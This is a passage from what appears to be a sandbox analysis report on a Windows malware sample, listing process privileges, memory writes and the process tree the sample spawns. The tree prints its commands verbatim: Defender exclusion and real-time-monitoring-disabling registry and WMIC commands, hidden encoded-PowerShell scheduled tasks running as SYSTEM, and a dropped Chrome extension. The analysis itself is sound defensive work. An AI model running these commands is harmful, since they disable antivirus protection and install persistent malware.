1888 WMIC.exe Token: SeSecurityPrivilege 1888 WMIC.exe Token: SeTakeOwnershipPrivilege 1888 WMIC.exe Token: SeLoadDriverPrivilege 1888 WMIC.exe Token: SeSystemtimePrivilege 1888 WMIC.exe Token: SeBackupPrivilege 1888 WMIC.exe Token: SeRestorePrivilege 1888 WMIC.exe Token: SeShutdownPrivilege 1888 WMIC.exe Token: SeSystemEnvironmentPrivilege 1888 WMIC.exe Token: SeUndockPrivilege 1888 WMIC.exe Token: SeManageVolumePrivilege 1888 WMIC.exe Token: SeDebugPrivilege 592 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2056 WMIC.exe Token: SeIncreaseQuotaPrivilege 2056 WMIC.exe Token: SeSecurityPrivilege 2056 WMIC.exe Token: SeTakeOwnershipPrivilege 2056 WMIC.exe Token: SeLoadDriverPrivilege 2056 WMIC.exe Token: SeSystemtimePrivilege 2056 WMIC.exe Token: SeBackupPrivilege 2056 WMIC.exe Token: SeRestorePrivilege 2056 WMIC.exe Token: SeShutdownPrivilege 2056 WMIC.exe Token: SeSystemEnvironmentPrivilege 2056 WMIC.exe Token: SeUndockPrivilege 2056 WMIC.exe Token: SeManageVolumePrivilege 2056 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1376 wrote to memory of 2392 1376 195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe 28 PID 1376 wrote to memory of 2392 1376 195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe 28 PID 1376 wrote to memory of 2392 1376 195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe 28 PID 1376 wrote to memory of 2392 1376 195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe 28 PID 1376 wrote to memory of 2392 1376 195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe 28 PID 1376 wrote to memory of 2392 1376 195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe 28 PID 1376 wrote to memory of 2392 1376 195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe 28 PID 2392 wrote to memory of 864 2392 Install.exe 29 PID 2392 wrote to memory of 864 2392 Install.exe 29 PID 2392 wrote to memory of 864 2392 Install.exe 29 PID 2392 wrote to memory of 864 2392 Install.exe 29 PID 2392 wrote to memory of 864 2392 Install.exe 29 PID 2392 wrote to memory of 864 2392 Install.exe 29 PID 2392 wrote to memory of 864 2392 Install.exe 29 PID 864 wrote to memory of 2796 864 Install.exe 31 PID 864 wrote to memory of 2796 864 Install.exe 31 PID 864 wrote to memory of 2796 864 Install.exe 31 PID 864 wrote to memory of 2796 864 Install.exe 31 PID 864 wrote to memory of 2796 864 Install.exe 31 PID 864 wrote to memory of 2796 864 Install.exe 31 PID 864 wrote to memory of 2796 864 Install.exe 31 PID 2796 wrote to memory of 2872 2796 forfiles.exe 33 PID 2796 wrote to memory of 2872 2796 forfiles.exe 33 PID 2796 wrote to memory of 2872 2796 forfiles.exe 33 PID 2796 wrote to memory of 2872 2796 forfiles.exe 33 PID 2796 wrote to memory of 2872 2796 forfiles.exe 33 PID 2796 wrote to memory of 2872 2796 forfiles.exe 33 PID 2796 wrote to memory of 2872 2796 forfiles.exe 33 PID 2872 wrote to memory of 2544 2872 cmd.exe 34 PID 2872 wrote to memory of 2544 2872 cmd.exe 34 PID 2872 wrote to memory of 2544 2872 cmd.exe 34 PID 2872 wrote to memory of 2544 2872 cmd.exe 34 PID 2872 wrote to memory of 2544 2872 cmd.exe 34 PID 2872 wrote to memory of 2544 2872 cmd.exe 34 PID 2872 wrote to memory of 2544 2872 cmd.exe 34 PID 2544 wrote to memory of 2564 2544 powershell.exe 35 PID 2544 wrote to memory of 2564 2544 powershell.exe 35 PID 2544 wrote to memory of 2564 2544 powershell.exe 35 PID 2544 wrote to memory of 2564 2544 powershell.exe 35 PID 2544 wrote to memory of 2564 2544 powershell.exe 35 PID 2544 wrote to memory of 2564 2544 powershell.exe 35 PID 2544 wrote to memory of 2564 2544 powershell.exe 35 PID 864 wrote to memory of 2124 864 Install.exe 36 PID 864 wrote to memory of 2124 864 Install.exe 36 PID 864 wrote to memory of 2124 864 Install.exe 36 PID 864 wrote to memory of 2124 864 Install.exe 36 PID 864 wrote to memory of 2124 864 Install.exe 36 PID 864 wrote to memory of 2124 864 Install.exe 36 PID 864 wrote to memory of 2124 864 Install.exe 36 PID 2152 wrote to memory of 1976 2152 taskeng.exe 39 PID 2152 wrote to memory of 1976 2152 taskeng.exe 39 PID 2152 wrote to memory of 1976 2152 taskeng.exe 39 PID 2152 wrote to memory of 1976 2152 taskeng.exe 39 PID 1976 wrote to memory of 2208 1976 UGwXVSe.exe 40 PID 1976 wrote to memory of 2208 1976 UGwXVSe.exe 40 PID 1976 wrote to memory of 2208 1976 UGwXVSe.exe 40 PID 1976 wrote to memory of 2208 1976 UGwXVSe.exe 40 PID 1976 wrote to memory of 880 1976 UGwXVSe.exe 42 PID 1976 wrote to memory of 880 1976 UGwXVSe.exe 42 PID 1976 wrote to memory of 880 1976 UGwXVSe.exe 42 PID 1976 wrote to memory of 880 1976 UGwXVSe.exe 42 PID 1592 wrote to memory of 2832 1592 taskeng.exe 45 PID 1592 wrote to memory of 2832 1592 taskeng.exe 45 PID 1592 wrote to memory of 2832 1592 taskeng.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe"C:\Users\Admin\AppData\Local\Temp\195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\7zS257B.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Users\Admin\AppData\Local\Temp\7zS274F.tmp\Install.exe.\Install.exe /xTCdidQ "385137" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bkulktKnsMWheyTcHH" /SC once /ST 05:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA\YgRSiKsoVteJGtR\UGwXVSe.exe\" 3T /ZdidrSmZ 385137 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 5044⤵
- Loads dropped DLL
- Program crash
PID:2780
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D1597ED7-B3C1-4CBB-BDD2-D10F99BCEFC0} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA\YgRSiKsoVteJGtR\UGwXVSe.exeC:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA\YgRSiKsoVteJGtR\UGwXVSe.exe 3T /ZdidrSmZ 385137 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gayNAwmCL" /SC once /ST 00:50:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gayNAwmCL"3⤵PID:880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gayNAwmCL"3⤵PID:1096
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1112
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1876
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1576
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOUtXAGJD" /SC once /ST 01:05:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOUtXAGJD"3⤵PID:2300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOUtXAGJD"3⤵PID:2424
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2436
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:1728
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:323⤵PID:1600
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:643⤵PID:2348
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2660
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:323⤵PID:2156
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:324⤵PID:540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:643⤵PID:2316
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:644⤵PID:2264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\jEUQWIQvPKxTkmGv\abkKlBRK\MByQuGuzbBeQeTyl.wsf"3⤵PID:1276
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\jEUQWIQvPKxTkmGv\abkKlBRK\MByQuGuzbBeQeTyl.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2452 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DLOGhsaIU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DLOGhsaIU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JoukbHKXhnJgygRymeR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JoukbHKXhnJgygRymeR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LXFcSqNRPdfiC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LXFcSqNRPdfiC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bmRmotOcEZUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bmRmotOcEZUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dqJSprjCYNjU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dqJSprjCYNjU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\lKoxjEGWaXzMwnVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\lKoxjEGWaXzMwnVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DLOGhsaIU" /t REG_DWORD /d 0 /reg:324⤵PID:1616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DLOGhsaIU" /t REG_DWORD /d 0 /reg:644⤵PID:2024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JoukbHKXhnJgygRymeR" /t REG_DWORD /d 0 /reg:324⤵PID:1368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JoukbHKXhnJgygRymeR" /t REG_DWORD /d 0 /reg:644⤵PID:1852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LXFcSqNRPdfiC" /t REG_DWORD /d 0 /reg:324⤵PID:2068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LXFcSqNRPdfiC" /t REG_DWORD /d 0 /reg:644⤵PID:1252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bmRmotOcEZUn" /t REG_DWORD /d 0 /reg:324⤵PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bmRmotOcEZUn" /t REG_DWORD /d 0 /reg:644⤵PID:2476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dqJSprjCYNjU2" /t REG_DWORD /d 0 /reg:324⤵PID:1144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dqJSprjCYNjU2" /t REG_DWORD /d 0 /reg:644⤵PID:1804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\lKoxjEGWaXzMwnVB" /t REG_DWORD /d 0 /reg:324⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\lKoxjEGWaXzMwnVB" /t REG_DWORD /d 0 /reg:644⤵PID:292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA" /t REG_DWORD /d 0 /reg:324⤵PID:2120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA" /t REG_DWORD /d 0 /reg:644⤵PID:916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:324⤵PID:1272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jEUQWIQvPKxTkmGv" /t REG_DWORD /d 0 /reg:644⤵PID:1524
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gymrurLWC" /SC once /ST 01:44:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gymrurLWC"3⤵PID:2324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gymrurLWC"3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1280
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2996
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2596
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QGKRfysOUInPGCvKQ" /SC once /ST 02:44:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jEUQWIQvPKxTkmGv\izLXyiINtDhbyEF\hpiTpDn.exe\" rx /MuqHdidqE 385137 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QGKRfysOUInPGCvKQ"3⤵PID:2288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 4803⤵
- Loads dropped DLL
- Program crash
PID:2732
-
-
-
C:\Windows\Temp\jEUQWIQvPKxTkmGv\izLXyiINtDhbyEF\hpiTpDn.exeC:\Windows\Temp\jEUQWIQvPKxTkmGv\izLXyiINtDhbyEF\hpiTpDn.exe rx /MuqHdidqE 385137 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1816 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bkulktKnsMWheyTcHH"3⤵PID:2856
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:2876
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:2884
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2980
-
